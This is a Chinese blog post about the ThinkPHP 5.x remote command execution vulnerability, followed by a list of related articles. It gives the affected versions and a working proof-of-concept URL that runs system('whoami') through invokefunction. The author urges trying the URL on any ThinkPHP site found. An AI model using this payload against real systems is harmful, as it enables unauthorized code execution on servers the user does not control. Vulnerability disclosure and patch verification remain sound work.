THINKPHP5.X远程命令执行漏洞

最新推荐文章于 2024-08-15 09:11:40 发布

qq_40461312

最新推荐文章于 2024-08-15 09:11:40 发布

阅读量1.6k

点赞数 1

文章标签： php

本文链接：https://blog.csdn.net/qq_40461312/article/details/120676807

版权

前言

ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架

ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，推荐尽快更新到最新版本。

一、漏洞影响范围

5.x < 5.1.31, <= 5.0.23

二、如何确认THINKPHP版本

多数情况下直接引发报错页面即可获取到thinkphp版本信息，也可以通过指纹识别等网站，手段找到。

三、漏洞利用

哪有这么麻烦，见到thinkphp网站直接上POC,直接复制到域名后看响应

1.利用system函数远程命令执行

http://localhost/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

qq_40461312

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Thinkphp 5.x远程命令执行漏洞

白泽Sec安全实验室

11-07

1661

漏洞描述 ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，推荐尽快更新到最新版本。 thinkphp5最出名的就是rce，rce有两个大版本的分别： ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同，导致payload分为多种，其中一些payload需要取决于debug选项比如直

thinkphp5调用shell脚本_ThinkPHP 5.x远程命令执行漏洞复现

weixin_34566429的博客

12-23

559

一、漏洞描述2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞:漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。二、漏洞影响版本Thinkphp 5.x-Thinkphp 5.1.31Thinkphp 5.0.x<=5.0.23三、漏洞复...

参与评论您还未登录，请先登录后发表或查看评论

ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞

qq_50854662的博客

10-23

1476

ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞漏洞概述: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。借鉴Struts框架的Action对象，同时也使用面向对象的开发结构和MVC模式。1月11日，ThinkPHP官方发布新版本5.0.24，在1月14日和15日发布两个更新，这几次更新都修复了远程代码执行漏洞，对于5.0.x、5.1.x、5.2.x 这几个版本，都无需登入可以进行远程代码执行。漏洞版本： 5.0.x5.1.x5.2.x 漏洞搭建

ThinkPHP远程代码执行漏洞分析及防御指南

最新发布

gitblog_00643的博客

08-15

975

ThinkPHP远程代码执行漏洞分析及防御指南项目地址:https://gitcode.com/gh_mirrors/th/ThinkphpRCE 一、项目介绍 1.1 概述 ThinkPHP是一款流行的PHP开发框架，以其简洁高效的特性深受开发者喜爱。然而，在一些版本中发现的安全漏洞威胁到了基于该框架构建的Web应用程序的安全性。其中，“thinkphp-RCE-POC”是针对ThinkPHP...

ThinkPHP5.x-远程命令执行漏洞

LYJ20010728的博客

06-06

749

ThinkPHP 5.x远程命令执行漏洞漏洞原因漏洞影响版本漏洞复现搭建漏洞环境POC1POC2&POC3POC4&POC5 漏洞原因由于框架对控制器名没有进行足够的检测，导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行漏洞影响版本 Thinkphp 5.x-Thinkphp 5.1.31 Thinkphp 5.0.x<=5.0.23 漏洞复现搭建漏洞环境官网下载Thinkphp 5.0.22，下载地址使用phpstudy搭建环境，解压下载的Thin

ThinkPHP5远程命令执行漏洞

qq_45314073的博客

09-20

2068

thinkPHP5漏洞复现

Thinkphp v5.x 远程代码执行漏洞复现及POC集合

qq_67473072的博客

07-13

6595

Thinkphp v5.x 远程代码执行漏洞复现及POC集合

ThinkPHP5.0.x远程执行漏洞分析与复现

qq_74148743的博客

05-11

1383

2018年12月10日，ThinkPHPv5系列发布安全更新，修复了一处可导致远程代码执行的严重漏洞。此次漏洞由ThinkPHP v5框架代码问题引起，其覆盖面广，且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多，需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测，导致在没有开启强制路由的情况下，黑客构造特定的请求，可直接进行远程的代码执行，进而获得服务器权限。

ThinkPHP v5.x命令执行利用工具（可getshell）

11-19

在这个场景中，"ThinkPHP v5.x命令执行利用工具（可getshell）"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具，该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。命令执行漏洞...

thinkphp5框架漏洞

m0_74196038的博客

03-07

1518

ThinkPHP是一个免费开源的，快速、简单的面向对象的轻量级PHP开发框架，是为了敏捷WEB应用开发和简化企业应用开发而诞生的这个poc是通过post方法提交的，然后url当中还是要提交?s=captcha特殊url编码之后的POC。

【漏洞复现】ThinkPHP5.x远程代码执行

Kris__zhang的博客

04-23

542

一、漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075 漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。二、漏洞影响版本 Thinkphp 5.x-Thinkphp 5.1.31 Thinkphp 5.0.x<=5.0.23 三、漏洞复现 1、官网下载Thinkphp 5

漏洞预警 | ThinkPHP 5.x远程命令执行漏洞

a970241850的博客

12-13

238

ThinkPHP采用面向对象的开发结构和MVC模式，融合了Struts的思想和TagLib（标签库）、RoR的ORM映射和ActiveRecord模式，是一款兼容性高、部署简单的轻量级国产PHP开发框架。近日，ThinkPHP团队发布了版本更新信息，修复一个远程代码执行漏洞。该漏洞是由于框架对控制器名没有进行足够的检测，导致在没有开启强制路由的情况下可远程执行代码。攻击者利用该漏洞，...

Thinkphp5.0.23远程代码执行漏洞复现

02-01

1753

Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现。

ThiThinkPHP5.x 远程函数执行

有时候，想要一块二向箔

08-31

716

正文实验地址：ThinkPHP5.x 远程函数执行与sql注入_安全龙-专注做企业网络安全服务与网络安全培训! (anquanlong.com) 知识梳理： PoC，全称“Proof of Concept”，中文“概念验证”，常指一段漏洞证明的代码。 Exp，全称“Exploit”，中文“利用”，指利用系统漏洞进行攻击的动作。 Payload，中文“有效载荷”，指成功 exploit 之后，真正在目标系统执行的代码或指令。 Shellcode，简单翻译“shell 代码”，是 Payload 的一种，由于

[代码审计]ThinkPHP 5.0.x 的代码执行漏洞

姜小孩的博客

06-14

739

目录TP5中的rce都是利用了input方法如何利用此方法如何引导到这来POC：ThinkPHP 5.0-5.0.24通过URL路由分析，我们知道Thinkphp可由外界直接控制模块名、类名和其中的方法名以及参数/参数值，那么我们是不是可以将程序运行的方向引导至这里来。要调用类肯定需要先将类实例化，类的实例化首先需要获取到模块、类名，然后解析模块和类名去组成命名空间，再根据命名空间的特性去自动加载类，然后才会实例化类和调用类中的方法。我们先对比之前正常的URL试着构建下POC。我们可以找到入口调

ThinkPHP5 远程命令执行漏洞分析

weixin_30906671的博客

12-13

136

本文首发自安全脉搏，转载请注明出处。前言 ThinkPHP官方最近修复了一个严重的远程代码执行漏洞。这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令，受影响的版本包括5.0和5.1版本。测试环境： ThinkPHP 5.1 beta+ win10 64bit + wamp 漏洞分析网上已经有些分析文章了，我就...

【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)

weixin_34314962的博客

12-11

4121

0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用（GetShell） 0x01步骤点击start to hack 进入环境页面 run the project 然后访问给出的target address执行系统命令显示目录下文件http://aaa.vsplate.me:52763/public/index.php?s=/index...

thinkphp 2.x 任意代码执行漏洞

06-28

这个问题是关于ThinkPHP 2.x是否存在代码漏洞的。据我所知，目前没有任何官方宣布过该版本存在漏洞的消息。但是任何一个应用程序都有可能存在漏洞，因此在使用任何版本的框架时都需要小心谨慎，并始终保持最新版本的...